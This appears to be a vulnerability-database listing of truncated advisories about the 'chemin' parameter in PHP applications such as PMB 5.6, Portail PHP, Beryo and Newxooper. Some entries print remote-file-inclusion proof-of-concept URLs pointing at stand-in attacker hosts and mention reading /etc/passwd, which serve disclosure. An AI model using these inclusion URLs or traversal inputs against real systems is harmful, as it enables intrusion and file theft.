CVE-2020-36970

CVE-2020-36970 affects PMB 5.6, with a local file disclosure vulnerability in getgif.php triggered by unsanitized input of the chemin parameter. Attackers can read arbitrary system files (e.g., /etc/passwd) by crafting requests to getgif.php, leading to high impact on confidentiality. The provide...

CVE-2020-36970 PMB 5.6 - 'chemin' Local File Disclosure

PMB 5.6 contains a local file disclosure vulnerability in getgif.php that allows attackers to read arbitrary system files by manipulating the 'chemin' parameter. Attackers can exploit the unsanitized file path input to access sensitive files like /etc/passwd by sending crafted requests to the...

EUVD-2020-30877

PMB 5.6 contains a local file disclosure vulnerability in getgif.php that allows attackers to read arbitrary system files by manipulating the 'chemin' parameter. Attackers can exploit the unsanitized file path input to access sensitive files like /etc/passwd by sending crafted requests to the...

CVE-2020-36970

PMB 5.6 contains a local file disclosure vulnerability in getgif.php that allows attackers to read arbitrary system files by manipulating the 'chemin' parameter. Attackers can exploit the unsanitized file path input to access sensitive files like /etc/passwd by sending crafted requests to the...

CVE-2020-36970 PMB 5.6 - 'chemin' Local File Disclosure

PMB 5.6 contains a local file disclosure vulnerability in getgif.php that allows attackers to read arbitrary system files by manipulating the 'chemin' parameter. Attackers can exploit the unsanitized file path input to access sensitive files like /etc/passwd by sending crafted requests to the...

PT-2026-5161

PMB 5.6 contains a local file disclosure vulnerability in getgif.php that allows attackers to read arbitrary system files by manipulating the 'chemin' parameter. Attackers can exploit the unsanitized file path input to access sensitive files like /etc/passwd by sending crafted requests to the...

EUVD-2006-4486

Malware in sbrugna...

EUVD-2006-5211

Malware in sbrugna...

EUVD-2001-1149

Malware in sbrugna...

EUVD-2006-1496

Malware in sbrugna...

EUVD-2007-1923

Malware in sbrugna...

Portail PHP <= 1.7 (chemin) Remote Inclusion Vulnerability

No description provided by source. Portail PHP v1.7 - chemin Remote Inclusion Vulnerability Author: xoron script: Portail PHP Class : Remote cont@ct: x0r0nathotmaildotcom CODE: include $chemin/include/config.php Exploit: http://www.site.com/path/modmembre/inscription.php?chemin=http://evilscripts...

CVE-2007-4457

Directory traversal vulnerability in forumreply.php in Dalai Forum 1.1 allows remote attackers to include and execute arbitrary local files via a .. dot dot in the chemin parameter...

Beryo 2.0 - &#039;downloadpic.php?chemin&#039; Remote File Disclosure

Beryo 2.0downloadpic.php cheminRemote File Disclosure Vulnerability D.Script: http://www.xrousse.org/shared/beryo-2.0.tar.gz Discovered by: GolDM = Mahmoodali Homepage: http://www.Tryag.cc Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group V.Code: readfile"$chemin";...

Directory traversal

Multiple directory traversal vulnerabilities in Cedric CLAIRE PortailPhp 2 allow remote attackers to read arbitrary files via a .. dot dot in the chemin parameter to 1 modnews/index.php or 2 modnews/goodies.php. NOTE: The provenance of this information is unknown; the details are obtained solely...

TLM CMS Chemin参数远程文件包含漏洞

TLM CMS是一款基于PHP的WEB应用程序。 TLM CMS不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'i-accueil.php'脚本对用户提交的'Chemin'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 comscripts.com TLM CMS 1.1 目前没有解决方案提供： http://www.comscripts.com/scripts/php.tlm-cms.2175.html http://www.example.com/i-accueil.php?chemin=EV!L.C0D3.Tx...

Newxooper-php 0.9.1 (mapage.php) Remote File Include Vulnerability

No description provided by source. Newxooper-php v0.9.1chemin Remote File Include Vulnerabilty Download:http://www.easy-script.com/newxoope-091.zip Author:Dr Max Virus Location:Egypt Bug in compteur/mapage.php In Line:37 Vul Code: REQUIRE "$chemin/compteur/mapage.txt"; POC:...

Newxooper-PHP 0.9.1 - mapage.php Remote File Inclusion

Newxooper-PHP 0.9.1 - mapage.php Remote File Inclusion Newxooper-php v0.9.1chemin Remote File Include Vulnerabilty Download:http://www.easy-script.com/newxoope-091.zip Author:Dr Max Virus Location:Egypt Bug in compteur/mapage.php In Line:37 Vul Code: REQUIRE "$chemin/compteur/mapage.txt"; POC:...

PT-2006-6573 · Jean Christophe Ramos · Script Bannieres

Name of the Vulnerable Software and Affected Versions: Jean-Christophe Ramos SCRIPT BANNIERES aka ban 0.1 and PLS-Bannieres 1.21 Description: The issue concerns a remote file inclusion vulnerability in the modules/bannieres/bannieres.php file, which could potentially allow remote attackers to...

PortailPHP mod_phpalbum 2.1.5 - &#039;chemin&#039; Remote File Inclusion

Portail PHP modphpalbum 2.15 Modules Remote File Inclusion Vulnerabilities Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: includeonce $chemin."conf/code.php" Exploit: http://www.site.com/path/modphpalbum/sommaireadmin.php?chemin=http://evilscripts? Greetz: str0ke, Ironfist, Predd...